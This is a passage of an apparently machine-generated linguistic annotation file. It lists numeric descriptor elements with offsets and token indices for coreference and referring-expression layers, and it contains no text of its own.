<desc id="3297" len="34" off="230">77~79~81~83</desc>
<desc id="3298" len="86" off="230">77~79~81~83~85~87~89~91~93~95~97</desc>
<desc id="3299" len="15" off="274">89~91</desc>
<desc id="3300" len="18" off="298">95~97</desc>
<desc id="3301" len="36" off="322">104~106~108~110~112~114</desc>
<desc id="3302" len="23" off="326">106~108~110~112</desc>
<desc id="3303" len="2" off="365">118</desc>
<desc id="3304" len="31" off="396">128~130~132~134~136~138~140</desc>
<desc id="3305" len="15" off="412">138~140</desc>
<desc id="3306" len="5" off="443">148</desc>
<desc id="3307" len="12" off="466">156~158~160</desc>
<desc id="3308" len="16" off="480">165~167~169</desc>
<desc id="3309" len="27" off="502">173~175~177~179~181</desc>
<desc id="3310" len="3" off="551">191</desc>
<desc id="3311" len="50" off="551">191~193~195~197~199~201~203~205~207</desc>
<desc id="3312" len="34" off="555">193~195~197~199~201~203</desc>
<desc id="3313" len="42" off="555">193~195~197~199~201~203~205</desc>
<desc id="3314" len="7" off="607">211~213</desc>
<desc id="3315" len="15" off="607">211~213~215</desc>
<desc id="3316" len="96" off="628">219~221~223~225~227~229~231~233~235~237~239~241~243~245~247~249~251</desc>
<desc id="3317" len="58" off="666">233~235~237~239~241~243~245~247~249~251</desc>
<desc id="3318" len="32" off="692">243~245~247~249~251</desc>
<desc id="3319" len="18" off="730">258~260~262</desc>
<desc id="3320" len="22" off="768">270~272~274~276~278</desc>
<desc id="3321" len="7" off="778">276</desc>
<desc id="3322" len="12" off="778">276~278</desc>
<desc id="3323" len="2" off="792">282</desc>
<desc id="3324" len="40" off="825">294~296~298~300~302~304~306~308~310</desc>
<desc id="3325" len="10" off="871">315~317</desc>
<desc id="3326" len="7" off="893">325</desc>
<desc id="3327" len="6" off="926">337</desc>
<desc id="3328" len="16" off="936">341~343~345</desc>
<desc id="3329" len="16" off="956">349~351~353</desc>
<desc id="3330" len="2" off="988">363</desc>
<desc id="3331" len="12" off="992">368~370</desc>
<desc id="3332" len="2" off="1010">374</desc>
<desc id="3333" len="19" off="1024">380~382~384</desc>
<desc id="3334" len="187" off="1065">392~394~396~398~400~402~404~406~408~410~412~414~416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3335" len="175" off="1077">398~400~402~404~406~408~410~412~414~416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3336" len="6" off="1104">406</desc>
<desc id="3337" len="19" off="1115">410~412</desc>
<desc id="3338" len="114" off="1138">416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3339" len="26" off="1159">426~428~430~432</desc>
<desc id="3340" len="10" off="1194">436~438</desc>
<desc id="3341" len="19" off="1209">442~444</desc>
<desc id="3342" len="26" off="1209">442~444~446</desc>
<desc id="3343" len="19" off="1254">457~459~461</desc>
<desc id="3344" len="40" off="1274">463~465~467~469~471~473</desc>
<desc id="3345" len="19" off="1278">465~467~469</desc>
<desc id="3346" len="27" off="1278">465~467~469~471</desc>
<desc id="3347" len="26" off="1321">477~479~481~483~485~487</desc>
<desc id="3348" len="28" off="1357">493~495~497~499~501</desc>
<desc id="3349" len="4" off="1359">495</desc>
<desc id="3350" len="31" off="1415">513~515~517~519~521~523</desc>
<desc id="3351" len="15" off="1431">521~523</desc>
<desc id="3352" len="8" off="1448">528~530</desc>
<desc id="3353" len="3" off="1468">536</desc>
<desc id="3354" len="73" off="1472">538~540~542~544~546~548~550~552~554~556~558</desc>
<desc id="3355" len="35" off="1510">550~552~554~556~558</desc>
<desc id="3356" len="16" off="1558">564~566~568</desc>
<desc id="3357" len="25" off="1578">572~574~576~578</desc>
<desc id="3358" len="7" off="1626">588~590</desc>
<desc id="3359" len="46" off="1658">605~607~609~611~613~615~617</desc>
<desc id="3360" len="4" off="1671">611</desc>
<desc id="3361" len="24" off="1671">611~613~615</desc>
<desc id="3362" len="18" off="1717">625~627~629</desc>
<desc id="3363" len="25" off="1755">637~639~641~643~645</desc>
<desc id="3364" len="7" off="1773">643~645</desc>
<desc id="3365" len="12" off="1792">654~656</desc>
<desc id="3366" len="97" off="1815">662~664~666~668~670~672~674~676~678~680~682~684~686~688~690~692</desc>
<desc id="3367" len="12" off="1873">680~682</desc>
<desc id="3368" len="18" off="1894">688~690~692</desc>
<desc id="3369" len="8" off="1898">690</desc>
<desc id="3370" len="36" off="1928">698~700~702~704~706~708</desc>
<desc id="3371" len="5" off="1989">720</desc>
<desc id="3372" len="37" off="1989">720~722~724~726~728</desc>
<desc id="3373" len="20" off="1999">724~726</desc>
<desc id="3374" len="15" off="2041">735~737</desc>
<desc id="3375" len="8" off="2073">743~745</desc>
<desc id="3376" len="36" off="2073">743~745~747~749~751</desc>
<desc id="3377" len="20" off="2125">757~759~761~763</desc>
<desc id="3378" len="7" off="2138">761~763</desc>
<desc id="3379" len="28" off="2159">769~771~773</desc>
<desc id="3380" len="40" off="2191">777~779~781~783~785~787~789~791</desc>
<desc id="3381" len="27" off="2204">783~785~787~789~791</desc>
<desc id="3382" len="18" off="2233">796~798~800~802</desc>
<desc id="3383" len="19" off="2261">806~808</desc>
<desc id="3384" len="5" off="2282">812</desc>
<desc id="3385" len="12" off="2309">823~825</desc>
<desc id="3386" len="103" off="2338">833~835~837~839~841~843~845~847~849~851~853~855~857~859~861</desc>
<desc id="3387" len="19" off="2398">851~853~855</desc>
<desc id="3388" len="16" off="2425">859~861</desc>
<desc id="3389" len="25" off="2455">869~871~873~875</desc>
<desc id="3390" len="41" off="2485">879~881~883~885~887~889</desc>
<desc id="3391" len="19" off="2490">881~883~885</desc>
<desc id="3392" len="27" off="2490">881~883~885~887</desc>
<desc id="3393" len="17" off="2528">893~895~897</desc>
<desc id="3394" len="15" off="2553">903~905~907</desc>
<desc id="3395" len="18" off="2573">914~916</desc>
<desc id="3396" len="28" off="2604">924~926~928~930</desc>
<desc id="3397" len="12" off="2637">934~936</desc>
<desc id="3398" len="8" off="2652">941~943</desc>
<desc id="3399" len="21" off="2666">947~949~951</desc>
<desc id="3400" len="32" off="2714">963~965~967~969~971~973</desc>
<desc id="3401" len="9" off="2748">978~980</desc>
<desc id="3402" len="22" off="2771">986~988~990</desc>
<desc id="3403" len="9" off="2797">994</desc>
<desc id="3404" len="15" off="2820">1000~1002~1004</desc>
<desc id="3405" len="33" off="2843">1008~1010~1012~1014~1016~1018</desc>
<desc id="3406" len="10" off="2881">1025</desc>
<desc id="3407" len="5" off="2893">1029</desc>
<desc id="3408" len="12" off="2893">1029~1031</desc>
<desc id="3409" len="10" off="2911">1035~1037</desc>
<desc id="3410" len="11" off="2927">1041</desc>
<desc id="3411" len="128" off="2944">1045~1047~1049~1051~1053~1055~1057~1059~1061~1063~1065~1067~1069~1071~1073~1075~1077~1079~1081~1083~1085~1087</desc>
<desc id="3412" len="48" off="2969">1055~1057~1059~1061~1063~1065~1067~1069</desc>
<desc id="3413" len="13" off="2993">1061~1063~1065</desc>
<desc id="3414" len="24" off="2993">1061~1063~1065~1067~1069</desc>
<desc id="3415" len="32" off="3023">1073~1075~1077~1079~1081</desc>
<desc id="3416" len="10" off="3062">1085~1087</desc>
<desc id="3417" len="2" off="3092">1102</desc>
<desc id="3418" len="5" off="3105">1108</desc>
<desc id="3419" len="10" off="3128">1116~1118</desc>
<desc id="3420" len="6" off="3153">1124</desc>
<desc id="3421" len="30" off="3173">1133~1135~1137~1139</desc>
<desc id="3422" len="71" off="3205">1143~1145~1147~1149~1151~1153~1155~1157~1159~1161~1163</desc>
<desc id="3423" len="31" off="3245">1157~1159~1161~1163</desc>
<desc id="3424" len="17" off="3259">1161~1163</desc>
<desc id="3425" len="2" off="3283">1169</desc>
<desc id="3426" len="54" off="3291">1173~1175~1177~1179~1181~1183</desc>
<desc id="3427" len="5" off="3295">1175</desc>
<desc id="3428" len="2" off="3351">1187</desc>
<desc id="3429" len="33" off="3368">1193~1195~1197~1199</desc>
<desc id="3430" len="7" off="3415">1205~1207</desc>
<desc id="3431" len="12" off="3449">1217~1219</desc>
<desc id="3432" len="6" off="3467">1225~1227</desc>
<desc id="3433" len="26" off="3475">1232~1234~1236</desc>
<desc id="3434" len="12" off="3519">1246~1248</desc>
<desc id="3435" len="11" off="3544">1258~1260</desc>
<desc id="3436" len="19" off="3562">1266~1268</desc>
<desc id="3437" len="7" off="3596">1276~1278</desc>
<desc id="3438" len="69" off="3604">1280~1282~1284~1286~1288~1290~1292~1294~1296~1298~1300~1302</desc>
<desc id="3439" len="12" off="3626">1290~1292</desc>
<desc id="3440" len="7" off="3645">1296</desc>
<desc id="3441" len="3" off="3675">1307</desc>
<desc id="3442" len="28" off="3675">1307~1309~1311~1313</desc>
<desc id="3443" len="2" off="3713">1319</desc>
<desc id="3444" len="48" off="3746">1331~1333~1335~1337~1339~1341~1343</desc>
<desc id="3445" len="21" off="3773">1339~1341~1343</desc>
<desc id="3446" len="2" off="3800">1349</desc>
<desc id="3447" len="19" off="3817">1357~1359</desc>
<desc id="3448" len="8" off="3845">1365</desc>
<desc id="3449" len="12" off="3855">1370~1372~1374</desc>
<desc id="3450" len="5" off="3857">1372</desc>
<desc id="3451" len="10" off="3883">1380~1382</desc>
<desc id="3452" len="19" off="3934">1404~1406~1408~1410</desc>
<desc id="3453" len="5" off="3954">1412</desc>
<desc id="3454" len="24" off="3960">1414~1416~1418~1420</desc>
<desc id="3455" len="9" off="4022">1441~1443</desc>
<desc id="3456" len="10" off="4033">1447~1449</desc>
<desc id="3457" len="16" off="4052">1453~1455</desc>
<desc id="3458" len="58" off="4052">1453~1455~1457~1459~1461~1463~1465~1467~1469~1471~1473</desc>
<desc id="3459" len="57" off="4137">1487~1489~1491~1493~1495~1497~1499~1501~1503</desc>
<desc id="3460" len="22" off="4172">1499~1501~1503</desc>
<desc id="3461" len="6" off="4198">1510</desc>
<desc id="3462" len="2" off="4210">1514</desc>
<desc id="3463" len="4" off="4229">1522</desc>
<desc id="3464" len="31" off="4255">1532~1534~1536~1538</desc>
<desc id="3465" len="8" off="4302">1546~1548</desc>
<desc id="3466" len="10" off="4317">1555~1557</desc>
<desc id="3467" len="2" off="4349">1565</desc>
<desc id="3468" len="8" off="4387">1579~1581</desc>
<desc id="3469" len="9" off="4399">1585~1587</desc>
<desc id="3470" len="8" off="4410">1591~1593</desc>
<desc id="3471" len="32" off="4430">1602~1604~1606~1608~1610</desc>
<desc id="3472" len="11" off="4451">1608~1610</desc>
<desc id="3473" len="11" off="4464">1614~1616</desc>
<desc id="3474" len="10" off="4482">1620~1622</desc>
<desc id="3475" len="33" off="4521">1634~1636~1638~1640~1642~1644</desc>
<desc id="3476" len="17" off="4523">1636~1638~1640</desc>
<desc id="3477" len="23" off="4523">1636~1638~1640~1642</desc>
<desc id="3478" len="5" off="4555">1646</desc>
<desc id="3479" len="10" off="4562">1651~1653</desc>
<desc id="3480" len="13" off="4578">1657~1659~1661</desc>
<desc id="3481" len="25" off="4612">1671~1673~1675</desc>
<desc id="3482" len="13" off="4639">1680~1682</desc>
<desc id="3483" len="11" off="4661">1686~1688</desc>
<desc id="3484" len="11" off="4674">1692~1694</desc>
<desc id="3485" len="15" off="4697">1702~1704</desc>
<desc id="3486" len="27" off="4746">1718~1720~1722~1724~1726</desc>
<desc id="3487" len="9" off="4764">1724~1726</desc>
<desc id="3488" len="29" off="4791">1736~1738~1740~1742~1744~1746</desc>
<desc id="3489" len="10" off="4810">1744~1746</desc>
<desc id="3490" len="38" off="4822">1751~1753~1755~1757~1759~1761</desc>
<desc id="3491" len="27" off="4833">1755~1757~1759~1761</desc>
<desc id="3492" len="12" off="4870">1765~1767</desc>
<desc id="3493" len="163" off="4897">1775~1777~1779~1781~1783~1785~1787~1789~1791~1793~1795~1797~1799~1801~1803~1805~1807~1809~1811~1813~1815~1817~1819~1821~1823~1825~1827~1829~1831~1833</desc>
<desc id="3494" len="5" off="4935">1793</desc>
<desc id="3495" len="36" off="4935">1793~1795~1797~1799~1801</desc>
<desc id="3496" len="10" off="5010">1819~1821</desc>
<desc id="3497" len="15" off="5027">1825~1827</desc>
<desc id="3498" len="14" off="5046">1831~1833</desc>
<desc id="3499" len="11" off="5062">1838~1840</desc>
<desc id="3500" len="7" off="5084">1844</desc>
<desc id="3501" len="7" off="5093">1848</desc>
<desc id="3502" len="97" off="5113">1856~1858~1860~1862~1864~1866~1868~1870~1872~1874~1876~1878~1880~1882</desc>
<desc id="3503" len="58" off="5152">1864~1866~1868~1870~1872~1874~1876~1878~1880~1882</desc>
<desc id="3504" len="7" off="5180">1874</desc>
<desc id="3505" len="12" off="5198">1880~1882</desc>
<desc id="3506" len="20" off="5212">1887~1889~1891</desc>
<desc id="3507" len="7" off="5216">1889</desc>
<desc id="3508" len="101" off="5250">1899~1901~1903~1905~1907~1909~1911~1913~1915~1917~1919~1921~1923~1925~1927</desc>
<desc id="3509" len="27" off="5309">1917~1919~1921</desc>
<desc id="3510" len="11" off="5340">1925~1927</desc>
</rep>
<rep id="edu.mit.discourse.rep.coref">
<desc id="3511" len="2660" off="0">Redacted|3289,3290,3291,3292,3293,3294,3295,3296,3297,3298,3299,3300,3301,3302,3303,3304,3305,3306,3307,3308,3309,3310,3311,3312,3313,3314,3315,3316,3317,3318,3319,3320,3321,3322,3323,3324,3325,3326,3327,3328,3329,3330,3331,3332,3333,3334,3335,3336,3337,3338,3339,3340,3341,3342,3343,3344,3345,3346,3347,3348,3349,3350,3351,3352,3353,3354,3355,3356,3357,3358,3359,3360,3361,3362,3363,3364,3365,3366,3367,3368,3369,3370,3371,3372,3373,3374,3375,3376,3377,3378,3379,3380,3381,3382,3383,3384,3385,3386,3387,3388,3389,3390,3391,3392,3393,3394,3395,3396,3397,3398,3399,3400,3401,3402,3403,3404,3405,3406,3407,3408,3409,3410,3411,3412,3413,3414,3415,3416,3417,3418,3419,3420,3421,3422,3423,3424,3425,3426,3427,3428,3429,3430,3431,3432,3433,3434,3435,3436,3437,3438,3439,3440,3441,3442,3443,3444,3445,3446,3447,3448,3449,3450,3451,3452,3453,3454,3455,3456,3457,3458,3459,3460,3461,3462,3463,3464,3465,3466,3467,3468,3469,3470,3471,3472,3473,3474,3475,3476,3477,3478,3479,3480,3481,3482,3483,3484,3485,3486,3487,3488,3489,3490,3491,3492,3493,3494,3495,3496,3497,3498,3499,3500,3501,3502,3503,3504,3505,3506,3507,3508,3509,3510</desc>
</rep>
<rep id="es.ucm.nil.indication.rep.indication">
<desc id="3621" len="31" off="0">3289|MOD:DIST:2|NUC:DIST:4~6~8</desc>
<desc id="3622" len="2" off="37">3290|NUC:DIST:12</desc>
<desc id="3623" len="66" off="59">3291|MOD:DIST:20|MOD:DIST:22|NUC:DESC:26~28|MOD:DIST:32~34~36~38~40</desc>
<desc id="3624" len="13" off="112">3292|MOD:DIST:38|NUC:DIST:40</desc>
<desc id="3625" len="12" off="139">3293|NUC:DIST:49~51</desc>
<desc id="3626" len="35" off="157">3294|MOD:DIST:55|MOD:DESC:57|MOD:DIST:59|MOD:DIST:61|NUC:DIST:63</desc>
<desc id="3627" len="10" off="196">3295|NUC:DIST:67</desc>
<desc id="3628" len="2" off="212">3296|NUC:DIST:71</desc>
<desc id="3629" len="34" off="230">3297|NUC:DIST:77~79~81~83</desc>
<desc id="3630" len="86" off="230">3298|MOD:DIST:77~79~81~83|NUC:DESC:85|MOD:DIST:87~89~91~93~95~97</desc>
<desc id="3631" len="15" off="274">3299|MOD:DIST:89|NUC:DIST:91</desc>
<desc id="3632" len="18" off="298">3300|MOD:DIST:95|NUC:DIST:97</desc>
<desc id="3633" len="36" off="322">3301|MOD:DIST:104|MOD:DIST:106~108~110~112|NUC:DESC:114</desc>
<desc id="3634" len="23" off="326">3302|NUC:DIST:106~108~110~112</desc>
<desc id="3635" len="2" off="365">3303|NUC:DIST:118</desc>
<desc id="3636" len="31" off="396">3304|MOD:DIST:128|NUC:DESC:132|MOD:DIST:136~138~140</desc>
<desc id="3637" len="15" off="412">3305|MOD:DIST:138|NUC:DIST:140</desc>
<desc id="3638" len="5" off="443">3306|NUC:DIST:148</desc>
<desc id="3639" len="12" off="466">3307|MOD:DIST:156|MOD:DIST:158|NUC:DIST:160</desc>
<desc id="3640" len="16" off="480">3308|MOD:DIST:165|MOD:DESC:167|NUC:DIST:169</desc>
<desc id="3641" len="27" off="502">3309|MOD:DIST:173|MOD:DESC:175|MOD:DIST:177|MOD:DIST:179|NUC:DIST:181</desc>
<desc id="3642" len="3" off="551">3310|NUC:DIST:191</desc>
<desc id="3643" len="50" off="551">3311|MOD:DIST:191|MOD:DIST:193~195~197~199~201~203~205|NUC:DESC:207</desc>
<desc id="3644" len="34" off="555">3312|MOD:DIST:193~195~197~199~201|NUC:DIST:203</desc>
<desc id="3645" len="42" off="555">3313|MOD:DIST:193~195~197~199~201~203|NUC:DIST:205</desc>
<desc id="3646" len="7" off="607">3314|NUC:DIST:211~213</desc>
<desc id="3647" len="15" off="607">3315|MOD:DIST:211~213|NUC:DIST:215</desc>
<desc id="3648" len="96" off="628">3316|MOD:DIST:219|MOD:DIST:221|NUC:DIST:223|MOD:DESC:227~229~231~233~235~237~239~241~243~245~247~249~251</desc>
<desc id="3649" len="58" off="666">3317|MOD:DIST:233~235|MOD:DIST:237|NUC:DIST:239|MOD:DIST:241~243~245~247~249~251</desc>
<desc id="3650" len="32" off="692">3318|MOD:DIST:243|NUC:DIST:245~247~249~251</desc>
<desc id="3651" len="18" off="730">3319|MOD:DIST:258|MOD:DIST:260|NUC:DIST:262</desc>
<desc id="3652" len="22" off="768">3320|NUC:DIST:270~272~274|MOD:DIST:276~278</desc>
<desc id="3653" len="7" off="778">3321|NUC:DIST:276</desc>
<desc id="3654" len="12" off="778">3322|MOD:DIST:276|NUC:DIST:278</desc>
<desc id="3655" len="2" off="792">3323|NUC:DIST:282</desc>
<desc id="3656" len="40" off="825">3324|MOD:DIST:294|MOD:DIST:296|NUC:DIST:298|MOD:DIST:300~302|MOD:DESC:304~306~308~310</desc>
<desc id="3657" len="10" off="871">3325|MOD:DIST:315|NUC:DIST:317</desc>
<desc id="3658" len="7" off="893">3326|NUC:DIST:325</desc>
<desc id="3659" len="6" off="926">3327|NUC:DIST:337</desc>
<desc id="3660" len="16" off="936">3328|MOD:DIST:341|MOD:DIST:343|NUC:DIST:345</desc>
<desc id="3661" len="16" off="956">3329|MOD:DIST:349|MOD:DIST:351|NUC:DIST:353</desc>
<desc id="3662" len="2" off="988">3330|NUC:DIST:363</desc>
<desc id="3663" len="12" off="992">3331|MOD:DIST:368|NUC:DIST:370</desc>
<desc id="3664" len="2" off="1010">3332|NUC:DIST:374</desc>
<desc id="3665" len="19" off="1024">3333|MOD:DIST:380|NUC:DESC:382~384</desc>
<desc id="3666" len="187" off="1065">3334|MOD:DIST:392|NUC:DIST:394|MOD:DIST:396~398~400~402~404~406~408~410~412~414~416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3667" len="175" off="1077">3335|MOD:DIST:398|MOD:DESC:400|NUC:DIST:402|MOD:DIST:404~406~408~410~412|MOD:DIST:414~416~418~420~422~424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3668" len="6" off="1104">3336|NUC:DIST:406</desc>
<desc id="3669" len="19" off="1115">3337|MOD:DIST:410|NUC:DIST:412</desc>
<desc id="3670" len="114" off="1138">3338|MOD:DIST:416|NUC:DIST:418~420|MOD:DESC:424~426~428~430~432~434~436~438~440~442~444~446~448~450~452</desc>
<desc id="3671" len="26" off="1159">3339|MOD:DIST:426|NUC:DIST:428~430~432</desc>
<desc id="3672" len="10" off="1194">3340|MOD:DIST:436|NUC:DIST:438</desc>
<desc id="3673" len="19" off="1209">3341|MOD:DIST:442|NUC:DIST:444</desc>
<desc id="3674" len="26" off="1209">3342|MOD:DIST:442~444|NUC:DIST:446</desc>
<desc id="3675" len="19" off="1254">3343|MOD:DIST:457|MOD:DIST:459|NUC:DIST:461</desc>
<desc id="3676" len="40" off="1274">3344|MOD:DIST:463|MOD:DIST:465~467~469~471|NUC:DIST:473</desc>
<desc id="3677" len="19" off="1278">3345|MOD:DIST:465~467|NUC:DIST:469</desc>
<desc id="3678" len="27" off="1278">3346|MOD:DIST:465~467~469|NUC:DIST:471</desc>
<desc id="3679" len="26" off="1321">3347|MOD:DESC:477~479~481~483|MOD:DIST:485|NUC:DIST:487</desc>
<desc id="3680" len="28" off="1357">3348|MOD:DIST:493|MOD:DIST:495|MOD:DIST:497~499|NUC:DIST:501</desc>
<desc id="3681" len="4" off="1359">3349|NUC:DIST:495</desc>
<desc id="3682" len="31" off="1415">3350|MOD:DIST:513|NUC:DIST:515|MOD:DIST:517~519~521~523</desc>
<desc id="3683" len="15" off="1431">3351|MOD:DIST:521|NUC:DIST:523</desc>
<desc id="3684" len="8" off="1448">3352|MOD:DIST:528|NUC:DIST:530</desc>
<desc id="3685" len="3" off="1468">3353|NUC:DIST:536</desc>
<desc id="3686" len="73" off="1472">3354|MOD:DESC:538|MOD:DIST:540|MOD:DIST:544|NUC:DIST:546|MOD:DIST:548~550~552~554~556~558</desc>
<desc id="3687" len="35" off="1510">3355|MOD:DIST:550~552|MOD:DIST:554|MOD:DIST:556|NUC:DIST:558</desc>
<desc id="3688" len="16" off="1558">3356|MOD:DIST:564~566|NUC:DIST:568</desc>
<desc id="3689" len="25" off="1578">3357|MOD:DIST:572|NUC:DIST:574~576~578</desc>
<desc id="3690" len="7" off="1626">3358|NUC:DIST:588~590</desc>
<desc id="3691" len="46" off="1658">3359|NUC:DIST:605~607|MOD:DESC:611~613~615~617</desc>
<desc id="3692" len="4" off="1671">3360|NUC:DIST:611</desc>
<desc id="3693" len="24" off="1671">3361|MOD:DIST:611|MOD:DIST:613|NUC:DIST:615</desc>
<desc id="3694" len="18" off="1717">3362|MOD:DIST:625|MOD:DIST:627|NUC:DIST:629</desc>
<desc id="3695" len="25" off="1755">3363|MOD:DIST:637|MOD:DIST:639|NUC:DIST:641|MOD:DIST:643~645</desc>
<desc id="3696" len="7" off="1773">3364|NUC:DIST:643~645</desc>
<desc id="3697" len="12" off="1792">3365|MOD:DIST:654|NUC:DIST:656</desc>
<desc id="3698" len="97" off="1815">3366|MOD:DIST:662|MOD:DIST:664|NUC:DESC:666|MOD:DIST:668~670~672~674~676~678~680~682~684~686~688~690~692</desc>
<desc id="3699" len="12" off="1873">3367|MOD:DIST:680|NUC:DIST:682</desc>
<desc id="3700" len="18" off="1894">3368|MOD:DIST:688|MOD:DIST:690|NUC:DIST:692</desc>
<desc id="3701" len="8" off="1898">3369|NUC:DIST:690</desc>
<desc id="3702" len="36" off="1928">3370|MOD:DIST:698|MOD:DESC:700|NUC:DIST:702|MOD:DIST:704~706~708</desc>
<desc id="3703" len="5" off="1989">3371|NUC:DIST:720</desc>
<desc id="3704" len="37" off="1989">3372|MOD:DIST:720~722~724~726|NUC:DIST:728</desc>
<desc id="3705" len="20" off="1999">3373|MOD:DIST:724|NUC:DIST:726</desc>
<desc id="3706" len="15" off="2041">3374|MOD:DIST:735|NUC:DIST:737</desc>
<desc id="3707" len="8" off="2073">3375|MOD:DIST:743|NUC:DIST:745</desc>
<desc id="3708" len="36" off="2073">3376|MOD:DIST:743~745~747|MOD:DIST:749|NUC:DIST:751</desc>
<desc id="3709" len="20" off="2125">3377|MOD:DIST:757|NUC:DESC:759|MOD:DIST:761~763</desc>
<desc id="3710" len="7" off="2138">3378|NUC:DIST:761~763</desc>
<desc id="3711" len="28" off="2159">3379|MOD:DIST:769|MOD:DIST:771|NUC:DIST:773</desc>
<desc id="3712" len="40" off="2191">3380|MOD:DIST:777|NUC:DIST:779|MOD:DIST:781~783~785~787~789~791</desc>
<desc id="3713" len="27" off="2204">3381|MOD:DIST:783|NUC:DIST:785~787~789~791</desc>
<desc id="3714" len="18" off="2233">3382|MOD:DIST:796~798|MOD:DIST:800|NUC:DIST:802</desc>
<desc id="3715" len="19" off="2261">3383|MOD:DIST:806|NUC:DIST:808</desc>
<desc id="3716" len="5" off="2282">3384|NUC:DIST:812</desc>
<desc id="3717" len="12" off="2309">3385|MOD:DIST:823|NUC:DIST:825</desc>
<desc id="3718" len="103" off="2338">3386|MOD:DIST:833|MOD:DIST:835|NUC:DIST:837~839|MOD:DIST:843~845~847~849~851~853~855~857~859~861</desc>
<desc id="3719" len="19" off="2398">3387|MOD:DIST:851|MOD:DIST:853|NUC:DIST:855</desc>
<desc id="3720" len="16" off="2425">3388|MOD:DIST:859|NUC:DIST:861</desc>
<desc id="3721" len="25" off="2455">3389|MOD:DIST:869|MOD:DIST:871|MOD:DIST:873|NUC:DIST:875</desc>
<desc id="3722" len="41" off="2485">3390|MOD:DIST:879|MOD:DIST:881~883~885~887|NUC:DIST:889</desc>
<desc id="3723" len="19" off="2490">3391|MOD:DIST:881~883|NUC:DIST:885</desc>
<desc id="3724" len="27" off="2490">3392|MOD:DIST:881~883~885|NUC:DIST:887</desc>
<desc id="3725" len="17" off="2528">3393|MOD:DIST:893|MOD:DIST:895|NUC:DIST:897</desc>
<desc id="3726" len="15" off="2553">3394|MOD:DIST:903|MOD:DIST:905|NUC:DIST:907</desc>
<desc id="3727" len="18" off="2573">3395|MOD:DIST:914|NUC:DIST:916</desc>
<desc id="3728" len="28" off="2604">3396|MOD:DIST:924|MOD:DIST:926|MOD:DIST:928|NUC:DIST:930</desc>
<desc id="3729" len="12" off="2637">3397|MOD:DIST:934|NUC:DIST:936</desc>
<desc id="3730" len="8" off="2652">3398|MOD:DIST:941|NUC:DIST:943</desc>
<desc id="3731" len="21" off="2666">3399|MOD:DIST:947|MOD:DESC:949|NUC:DIST:951</desc>
<desc id="3732" len="32" off="2714">3400|MOD:DIST:963|MOD:DIST:965|MOD:DIST:967|NUC:DIST:969|MOD:DIST:971~973</desc>
<desc id="3733" len="9" off="2748">3401|MOD:DIST:978|NUC:DIST:980</desc>
<desc id="3734" len="22" off="2771">3402|MOD:DESC:986|MOD:DIST:988|NUC:DIST:990</desc>
<desc id="3735" len="9" off="2797">3403|NUC:DIST:994</desc>
<desc id="3736" len="15" off="2820">3404|MOD:DIST:1000|MOD:DIST:1002|NUC:DIST:1004</desc>
<desc id="3737" len="33" off="2843">3405|MOD:DIST:1008|MOD:DIST:1010|MOD:DIST:1012|NUC:DIST:1014|MOD:DIST:1016~1018</desc>
<desc id="3738" len="10" off="2881">3406|NUC:DIST:1025</desc>
<desc id="3739" len="5" off="2893">3407|NUC:DIST:1029</desc>
<desc id="3740" len="12" off="2893">3408|MOD:DIST:1029|NUC:DIST:1031</desc>
<desc id="3741" len="10" off="2911">3409|MOD:DIST:1035|NUC:DIST:1037</desc>
<desc id="3742" len="11" off="2927">3410|NUC:DIST:1041</desc>
<desc id="3743" len="128" off="2944">3411|MOD:DIST:1045|NUC:DESC:1047|MOD:DESC:1051~1053~1055~1057~1059~1061~1063~1065~1067~1069~1071~1073~1075~1077~1079~1081~1083~1085~1087</desc>
<desc id="3744" len="48" off="2969">3412|MOD:DIST:1055|NUC:DIST:1057|MOD:DIST:1059~1061~1063~1065~1067~1069</desc>
<desc id="3745" len="13" off="2993">3413|MOD:DIST:1061|NUC:DESC:1063~1065</desc>
<desc id="3746" len="24" off="2993">3414|MOD:DIST:1061~1063~1065~1067|NUC:DIST:1069</desc>
<desc id="3747" len="32" off="3023">3415|MOD:DIST:1073|NUC:DIST:1075~1077~1079~1081</desc>
<desc id="3748" len="10" off="3062">3416|MOD:DIST:1085|NUC:DIST:1087</desc>
<desc id="3749" len="2" off="3092">3417|NUC:DIST:1102</desc>
<desc id="3750" len="5" off="3105">3418|NUC:DIST:1108</desc>
<desc id="3751" len="10" off="3128">3419|MOD:DIST:1116|NUC:DESC:1118</desc>
<desc id="3752" len="6" off="3153">3420|NUC:DIST:1124</desc>
<desc id="3753" len="30" off="3173">3421|MOD:DIST:1133|MOD:DIST:1135|MOD:DIST:1137|NUC:DIST:1139</desc>
<desc id="3754" len="71" off="3205">3422|MOD:DIST:1143|NUC:DIST:1145|MOD:DESC:1149~1151~1153~1155~1157~1159~1161~1163</desc>
<desc id="3755" len="31" off="3245">3423|NUC:DIST:1157|MOD:DIST:1159~1161~1163</desc>
<desc id="3756" len="17" off="3259">3424|MOD:DIST:1161|NUC:DIST:1163</desc>
<desc id="3757" len="2" off="3283">3425|NUC:DIST:1169</desc>
<desc id="3758" len="54" off="3291">3426|MOD:DIST:1173|MOD:DIST:1175~1177~1179~1181|NUC:DIST:1183</desc>
<desc id="3759" len="5" off="3295">3427|NUC:DIST:1175</desc>
<desc id="3760" len="2" off="3351">3428|NUC:DIST:1187</desc>
<desc id="3761" len="33" off="3368">3429|MOD:DIST:1193|MOD:DIST:1195|MOD:DIST:1197|NUC:DIST:1199</desc>
<desc id="3762" len="7" off="3415">3430|MOD:DIST:1205|NUC:DIST:1207</desc>
<desc id="3763" len="12" off="3449">3431|MOD:DIST:1217|NUC:DIST:1219</desc>
<desc id="3764" len="6" off="3467">3432|MOD:DIST:1225|NUC:DIST:1227</desc>
<desc id="3765" len="26" off="3475">3433|MOD:DIST:1232|MOD:DIST:1234|NUC:DIST:1236</desc>
<desc id="3766" len="12" off="3519">3434|NUC:DIST:1246~1248</desc>
<desc id="3767" len="11" off="3544">3435|NUC:DIST:1258~1260</desc>
<desc id="3768" len="19" off="3562">3436|MOD:DIST:1266|NUC:DIST:1268</desc>
<desc id="3769" len="7" off="3596">3437|MOD:DIST:1276|NUC:DIST:1278</desc>
<desc id="3770" len="69" off="3604">3438|MOD:DIST:1280|NUC:DIST:1282|MOD:DIST:1284~1286~1288~1290~1292~1294~1296~1298~1300~1302</desc>
